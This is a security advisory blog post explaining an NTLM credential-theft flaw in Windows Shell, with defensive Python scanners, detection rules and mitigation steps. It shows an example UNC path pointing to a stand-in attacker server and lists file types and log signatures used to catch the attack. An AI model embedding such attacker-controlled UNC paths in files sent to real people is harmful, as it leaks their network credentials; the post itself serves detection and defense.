
CVE-2026-32202: Windows Shell Credential Theft Explained

ZyberWalls Research Team. Independent cybersecurity researchers covering zero-days, CVEs, breach analysis and threat intelligence. All facts verified from primary sources.

Amit works at a logistics company in Pune. His manager sent him a file on Teams — a report shortcut, nothing unusual. He double-clicked it. Nothing seemed to happen. No pop-up. No warning. No slow-down. He assumed the file was broken and moved on with his day.

In that single double-click, his Windows computer had silently contacted an attacker's server and handed over his network password — automatically, invisibly, without asking for permission.

The attacker did not need Amit to type his password. Windows did it for him.

CVE-2026-32202 — Windows Shell Credential Theft — Key Facts
  • CVE: CVE-2026-32202 — Windows Shell spoofing and credential theft vulnerability
  • Official CVSS score: 4.3 Medium — but it is actively exploited in the wild, and the real impact is far higher
  • Microsoft confirmed: April 27, 2026 — revised advisory to acknowledge active exploitation
  • What it does: Opening or previewing a malicious file silently sends your Windows network password to an attacker
  • User action required: Just opening or previewing a file — no further clicks needed
  • Linked to: APT28 — Russia's military intelligence hacking unit, also known as Fancy Bear
  • Root cause: Incomplete fix — Microsoft patched CVE-2026-21510 but missed the authentication coercion flaw that remained
  • Patched: April 2026 Patch Tuesday — apply Windows Updates immediately
  • What gets stolen: Your NTLMv2 hash — the encrypted form of your Windows network password
  • What attackers do with it: Crack it offline to get the real password, or use it to impersonate you on the network immediately
  • Who is at risk: Every Windows user — home, office, government, hospital
Infographic: a user in Pune double-clicks a malicious shortcut, which silently sends their NTLM hash to an APT28 operator over outbound port 445; the attacker then impersonates them in Microsoft Active Directory within seconds. The bottom panel lists key mitigations, including blocking SMB and applying patches.

Root Cause — The Fix That Left a Door Open

This vulnerability exists because of an incomplete fix — the same pattern we have seen repeatedly in April 2026.

Earlier this year, Microsoft patched a different but related Windows flaw — CVE-2026-21510. That patch addressed the most obvious part of the problem: preventing attackers from running code on your machine through a malicious file. But while fixing that, Microsoft missed something sitting right next to it — the way Windows automatically tries to connect to network locations embedded in certain file types.

CVE-2026-32202 lives in that gap. The code execution path was blocked. The credential leakage path was not.

Security researcher Dahan, who analysed the flaw, described it precisely: "While Microsoft fixed the initial remote code execution flaw, the authentication coercion flaw remained. The gap between path resolution and trust verification left a zero-click credential theft vector via automatically parsed files."

In plain English — Microsoft fixed the more visible danger but missed the quieter one sitting right beside it.

How the Attack Works — The Automatic Handshake

To understand this attack, you need to understand one thing about how Windows works on a network.

When Windows encounters a file path that points to another computer on a network — something like \\server\folder\file — it automatically tries to connect to that location. It does not ask you. It does not warn you. It just connects. And when it connects, it automatically introduces itself using your Windows credentials — your username and an encrypted version of your password — as part of the standard network greeting process.

This automatic introduction is called an NTLM authentication handshake. It happens silently, in milliseconds, every time Windows tries to reach a network location.

Now here is how the attack works.

The attacker creates a malicious file — a shortcut, a document, a folder — that contains a hidden instruction pointing to a server they control. The file path inside it looks like: \\attacker-server.com\share\file. When you open, preview, or even browse to the folder containing this file, Windows sees the network path, automatically reaches out to the attacker's server, and sends your NTLMv2 hash as part of the standard connection greeting.

You never typed your password. You never approved any connection. Windows did it automatically — because that is how it was designed to work on corporate networks.

Think of it like this. You are at a hotel. Every time you walk past the front desk, the hotel automatically announces your name, room number, and a coded version of your key to anyone standing nearby — because that is the standard check-in protocol. An attacker stands near the desk with a recording device. You walk past. They have everything they need — without you ever saying a word or knowing they were there.
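The automatic handshake described above is triggered by a UNC path embedded in a file, so one thing a defender can do before a file reaches a user's desktop is look for such paths. The Python script below is an added example, not part of the original post and not ZyberWalls tooling. It pulls `\\host\path` references out of a file's raw bytes regardless of which field carries them, in both single-byte text (as in a .url file) and UTF-16LE (the encoding .lnk files use for their strings), and flags any whose host falls outside an assumed corporate allowlist. The allowlist, the hostnames, the 203.0.113.10 address and the sample inputs are all constructed for illustration.

```python
"""Flag shortcut-style files whose embedded UNC targets point outside the
organisation.  Added example for illustration; not the article's code."""
import re
from dataclasses import dataclass

# Assumed corporate allowlist (not from the article): UNC targets on these
# hosts or under these DNS suffixes are expected; anything else is flagged.
INTERNAL_HOSTS = {"fileserver01", "fileserver01.corp.example"}
INTERNAL_SUFFIXES = (".corp.example",)

# \\host\rest-of-path in single-byte text (e.g. the INI text of a .url file).
UNC_ASCII = re.compile(rb'\\\\([A-Za-z0-9][A-Za-z0-9.\-]*)\\([^\r\n\x00"<>|]+)')
# The same shape in UTF-16LE, which .lnk files use for string data: every
# ASCII character is followed by a NUL byte.
UNC_UTF16 = re.compile(
    rb'\\\x00\\\x00((?:[A-Za-z0-9.\-]\x00)+)\\\x00((?:[^\x00\r\n]\x00)+)'
)


@dataclass(frozen=True)
class UncHit:
    host: str
    path: str
    encoding: str  # "ascii" or "utf-16le"


def is_internal(host: str) -> bool:
    """True if the host is on the allowlist (case-insensitive, trailing dot ignored)."""
    h = host.lower().rstrip(".")
    return h in INTERNAL_HOSTS or h.endswith(INTERNAL_SUFFIXES)


def extract_unc_paths(data: bytes) -> list[UncHit]:
    """Return every \\host\path reference found anywhere in the raw bytes,
    without caring which field of the file format carries it."""
    hits: list[UncHit] = []
    for m in UNC_ASCII.finditer(data):
        hits.append(UncHit(m.group(1).decode("ascii"),
                           m.group(2).decode("latin-1"), "ascii"))
    for m in UNC_UTF16.finditer(data):
        hits.append(UncHit(m.group(1).decode("utf-16-le"),
                           m.group(2).decode("utf-16-le", "replace"), "utf-16le"))
    return hits


def external_unc_paths(data: bytes) -> list[UncHit]:
    """The hits that matter: UNC targets on hosts outside the allowlist.
    Opening, previewing or merely listing a file with such a target is what
    makes Windows start an NTLM handshake with that host."""
    return [h for h in extract_unc_paths(data) if not is_internal(h.host)]


# Constructed sample inputs (not real campaign files).
SAMPLE_INTERNAL = (b"[InternetShortcut]\r\n"
                   b"URL=\\\\fileserver01.corp.example\\reports\\q1.xlsx\r\n")
SAMPLE_EXTERNAL = (b"[InternetShortcut]\r\n"
                   b"URL=\\\\203.0.113.10\\share\\report.docx\r\n")
# A UTF-16LE fragment of the kind found inside a binary .lnk file; the first
# four bytes are the 0x4C header-size field every .lnk starts with.
SAMPLE_LNK_FRAGMENT = (b"L\x00\x00\x00"
                       + "\\\\203.0.113.10\\share\\report.docx".encode("utf-16-le")
                       + b"\x00\x00")


def scan_file(path: str) -> list[UncHit]:
    """Convenience wrapper for scanning a file on disk."""
    with open(path, "rb") as fh:
        return external_unc_paths(fh.read())


if __name__ == "__main__":
    for name, blob in (("internal.url", SAMPLE_INTERNAL),
                       ("external.url", SAMPLE_EXTERNAL),
                       ("fragment.lnk", SAMPLE_LNK_FRAGMENT)):
        hits = external_unc_paths(blob)
        verdict = "FLAG" if hits else "ok"
        print(f"{name:14s} {verdict:4s} {[(h.host, h.path) for h in hits]}")
```

Because the scan runs over raw bytes rather than a parsed structure, it catches a UNC target wherever the file format places it; the cost is that it cannot tell which field triggers the automatic connection, so treat every external hit as worth quarantining rather than trying to rank them.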

What Is an NTLMv2 Hash — And Why Is It Dangerous

Your Windows password is never stored or sent as plain text. Instead, Windows converts it into a scrambled string called a hash — a one-way mathematical transformation of your password. The NTLMv2 hash is what Windows sends during network authentication handshakes instead of the actual password.

Once an attacker has your NTLMv2 hash, they have two options — and both are serious.

Option 1 — Crack it offline. Using powerful computers and lists of common passwords, attackers can try millions of combinations per second until they find the password that produces the same hash. Shorter or common passwords can be cracked in minutes. Even complex passwords can be cracked given enough time and computing power. Once cracked, the attacker has your actual password — usable anywhere you use the same password.

Option 2 — Use it directly without cracking. In a technique called NTLM relay, the attacker does not even need to crack the hash. They immediately forward it to another server on your network, impersonating you in real time. If that server trusts NTLM authentication — and most Windows corporate networks do — the attacker gains access as you, right now, without ever knowing your actual password.

We covered NTLM hash theft and rainbow table cracking in detail earlier this year. The fundamentals are identical:

Net-NTLMv1 Is No Longer Safe: Rainbow Tables Explained

The APT28 Connection — Russia Is Using This Right Now

CVE-2026-32202 is not being exploited by random cybercriminals. Security researchers have linked active exploitation to APT28 — Russia's military intelligence hacking unit, run by the GRU. This is the same group behind the 2016 US Democratic National Committee hack, the 2017 NotPetya cyberattack that caused $10 billion in global damage, and dozens of ongoing espionage campaigns across Europe, government institutions, and NATO member countries.

APT28 has used NTLM hash theft as a primary technique for years. They embed malicious UNC paths in documents, emails, and calendar invites — targeting government officials, military personnel, journalists, and anyone connected to organisations they want to infiltrate. The credential they steal from one person becomes the key to the next system. Island hopping — the same technique TeamPCP used in the Trivy and LiteLLM supply chain attacks — applied to government networks.

The fact that a nation-state group is actively using this flaw means two things. The exploit works reliably. And the targets include not just individuals but entire organisations and government networks.

Indicators of Compromise (IOCs)

# CVE-2026-32202 Windows Shell Credential Theft — Detection

# Step 1 — Apply April 2026 Patch Tuesday immediately
# Check Windows Update status:
# Settings → Windows Update → Check for updates
# Ensure KB5058379 (Windows 11) or KB5058392 (Windows 10) is installed
# Verify: winver should show build 26100.3915 or higher on Win 11

# Step 2 — Block outbound SMB at firewall (critical mitigation)
# SMB uses port 445 — block outbound connections on port 445
# at your network firewall for all endpoints
# Most users and companies have no legitimate need for
# outbound SMB to the internet
# Corporate IT: netsh advfirewall firewall add rule ^
#   name="Block Outbound SMB" protocol=TCP dir=out ^
#   remoteport=445 action=block

# Step 3 — Enable Windows Defender Credential Guard
# Prevents NTLM hashes from being used in relay attacks
# Group Policy: Computer Configuration → Administrative Templates
#   → System → Device Guard → Turn on Virtualization Based Security

# Step 4 — Detection signatures in logs
Alert: Outbound SMB connection (port 445) from workstation
       to external/unknown IP address
Alert: explorer.exe or shell processes initiating
       outbound network connections to non-corporate IPs
Alert: NTLM authentication events to unknown external servers
       in Windows Security Event Log (Event ID 4624, Logon Type 3)

# Step 5 — File types used in active APT28 campaigns
# Be especially suspicious of:
# .lnk files (Windows shortcuts)
# .url files (internet shortcuts)
# .cpl files (control panel items)
# Received via email, Teams, WhatsApp, or file sharing
# All can trigger the automatic SMB connection without running code

# Step 6 — Check for compromise indicators
# If you opened a suspicious file before patching:
# Review Windows Security logs for unexpected NTLM auth events
# Change Windows/domain password immediately
# Alert IT team — NTLM relay may have already been used
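The three detection signatures in Step 4 above can be expressed as a few lines of logic over connection and logon records. The Python below is an added example, not part of the original post. The connection-log line format, the shell-process list and all sample records are constructed stand-ins; the 4624 field names `LogonType`, `AuthenticationPackageName` and `IpAddress` follow the Windows Security event, the rest is assumed; and "corporate" addresses are taken to be the RFC 1918 ranges plus loopback and link-local, which a real deployment would replace with its own ranges.

```python
"""Toy detection pass for the Step 4 signatures over constructed log records.
Added example for illustration; not the article's code."""
import ipaddress
from dataclasses import dataclass

# Processes that open or preview files on the user's behalf (assumed list).
SHELL_PROCESSES = {"explorer.exe", "prevhost.exe"}

# Address ranges treated as corporate/internal (assumed; replace with yours).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fe80::/10", "fc00::/7")]


@dataclass(frozen=True)
class Alert:
    rule: str
    host: str
    detail: str


def is_external(ip: str) -> bool:
    """True for routable addresses outside every internal range."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:          # e.g. "-" in a 4624 event with no address
        return False
    return not any(addr in net for net in INTERNAL_NETS)


def parse_net_line(line: str) -> dict:
    # Constructed format: "<ts> <host> <direction> <process> <src ip:port> -> <dst ip:port>"
    ts, host, direction, proc, _src, _arrow, dst = line.split()
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {"ts": ts, "host": host, "dir": direction,
            "proc": proc.lower(), "dst_ip": dst_ip, "dst_port": int(dst_port)}


def detect_network(lines: list[str]) -> list[Alert]:
    """Signatures 1 and 2: outbound SMB to an external address, and shell
    processes talking to external addresses on any port.  Both are checked
    independently, so one record can raise both."""
    alerts = []
    for line in lines:
        r = parse_net_line(line)
        if r["dir"] != "outbound" or not is_external(r["dst_ip"]):
            continue
        where = f'{r["proc"]} -> {r["dst_ip"]}:{r["dst_port"]}'
        if r["dst_port"] == 445:
            alerts.append(Alert("outbound-smb-external", r["host"], where))
        if r["proc"] in SHELL_PROCESSES:
            alerts.append(Alert("shell-process-external", r["host"], where))
    return alerts


def parse_sec_line(line: str) -> dict:
    # Constructed format: "<ts> <host> key=value key=value ..."
    ts, host, *kvs = line.split()
    fields = dict(kv.split("=", 1) for kv in kvs)
    fields.update(ts=ts, host=host)
    return fields


def detect_security(lines: list[str]) -> list[Alert]:
    """Signature 3: Event ID 4624, Logon Type 3, NTLM package, with a peer
    address outside the corporate ranges."""
    alerts = []
    for line in lines:
        f = parse_sec_line(line)
        if (f.get("EventID") == "4624" and f.get("LogonType") == "3"
                and f.get("AuthenticationPackageName") == "NTLM"
                and is_external(f.get("IpAddress", "-"))):
            alerts.append(Alert("ntlm-auth-external", f["host"],
                                f'{f.get("TargetUserName", "?")} from {f["IpAddress"]}'))
    return alerts


# Constructed sample records (not real telemetry).
NET_LOG = [
    "2026-04-28T09:14:02Z WS-PUNE-17 outbound explorer.exe 10.20.4.17:52114 -> 203.0.113.10:445",
    "2026-04-28T09:14:05Z WS-PUNE-17 outbound outlook.exe 10.20.4.17:52120 -> 198.51.100.7:443",
    "2026-04-28T09:15:11Z WS-PUNE-22 outbound explorer.exe 10.20.4.22:49877 -> 10.20.1.5:445",
    "2026-04-28T09:16:40Z WS-PUNE-22 outbound explorer.exe 10.20.4.22:49901 -> 198.51.100.7:80",
]
SEC_LOG = [
    "2026-04-28T09:14:03Z WS-PUNE-17 EventID=4624 LogonType=3 AuthenticationPackageName=NTLM TargetUserName=amit IpAddress=203.0.113.10",
    "2026-04-28T09:20:00Z FS-PUNE-01 EventID=4624 LogonType=3 AuthenticationPackageName=Kerberos TargetUserName=amit IpAddress=10.20.4.17",
    "2026-04-28T09:21:00Z WS-PUNE-17 EventID=4624 LogonType=2 AuthenticationPackageName=Negotiate TargetUserName=amit IpAddress=-",
]


def triage(net_lines: list[str], sec_lines: list[str]) -> list[Alert]:
    """Combined, de-duplicated alert list, most urgent rule first."""
    order = {"outbound-smb-external": 0, "ntlm-auth-external": 1, "shell-process-external": 2}
    return sorted(set(detect_network(net_lines) + detect_security(sec_lines)),
                  key=lambda a: (order[a.rule], a.host))


if __name__ == "__main__":
    for a in triage(NET_LOG, SEC_LOG):
        print(f"{a.rule:24s} {a.host:12s} {a.detail}")
```

The outbound-445 rule is the one with the best signal-to-noise ratio: a workstation has almost no legitimate reason to open SMB to a routable address, so a single hit is worth an immediate password reset for the user on that host. The shell-process rule is noisier (explorer.exe fetches thumbnails and icons over HTTP too), which is why the example ranks it last.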

SOC Alert Priorities

Priority 1 — Apply the April 2026 Patch Tuesday update on every Windows machine today. The patch exists. It is tested. It is free. Every Windows machine without KB5058379 or KB5058392 installed is actively vulnerable to a flaw being used by Russian military intelligence right now. This is a same-day patch — not a scheduled update.

Priority 2 — Block outbound SMB (port 445) at your network firewall immediately. Even before patching is complete, blocking outbound connections on port 445 prevents the credential theft from completing — the attacker's server cannot receive the NTLM handshake if the connection is blocked at the firewall. Most organisations have no legitimate reason for workstations to make outbound SMB connections to the internet. This single firewall rule eliminates the most dangerous exploitation path.

Priority 3 — Alert on all outbound port 445 connections from endpoints. Any workstation attempting an outbound SMB connection to an external IP address is a potential exploitation indicator. Add this detection to your SIEM or firewall logging immediately. A single triggered alert could mean an employee opened a malicious file before the patch was deployed.

Priority 4 — Warn employees specifically about .lnk, .url, and .cpl files. These are the three file types most commonly weaponised in NTLM coercion attacks. They look like ordinary shortcuts and icons. They can trigger the credential theft without the user running any code — just opening the folder they are in may be enough. Employees should treat any of these file types received unexpectedly — via email, Teams, WhatsApp, or file sharing — as potentially malicious.

Priority 5 — Enable Windows Defender Credential Guard across your fleet. Credential Guard prevents NTLM hashes from being used in relay attacks even if they are stolen. It is a built-in Windows feature available on Windows 11 and Windows 10 Enterprise. Enabling it does not stop the hash from being sent — but it makes the stolen hash significantly harder to exploit in follow-on attacks.

The ZyberWalls Perspective

CVE-2026-32202 has a CVSS score of 4.3 — officially classified as Medium severity. That number is almost meaningless in the context of what this flaw actually does.

CVSS scores measure technical severity in isolation — one vulnerability, one system, one impact. They do not measure what happens when a credential theft flaw is chained with an NTLM relay attack and used by a nation-state group against a corporate network. They do not measure the fact that APT28 has been sitting on this technique, using it in real operations, while Microsoft's advisory listed it as moderate severity.

Microsoft revised their advisory on April 27 — updating the exploitability rating after the flaw was already confirmed in active use. This is the same pattern as CVE-2026-21643 in FortiClient EMS, which was exploited for four days before official tracking lists acknowledged it. The gap between real-world exploitation and official severity ratings is becoming one of the most dangerous blind spots in enterprise security.

Amit in Pune double-clicked a file. His password is now in a database somewhere, being cracked or relayed as you read this. He did nothing wrong. He received what looked like a normal file from what looked like a normal source.

The only protection that would have saved him: a patched Windows machine and a firewall rule blocking outbound port 445. Both are available. Both are free. Neither requires expertise to implement.

Patch. Block port 445. Today.


Stay Alert. Stay Human. Stay Safe.
— ZyberWalls Research Team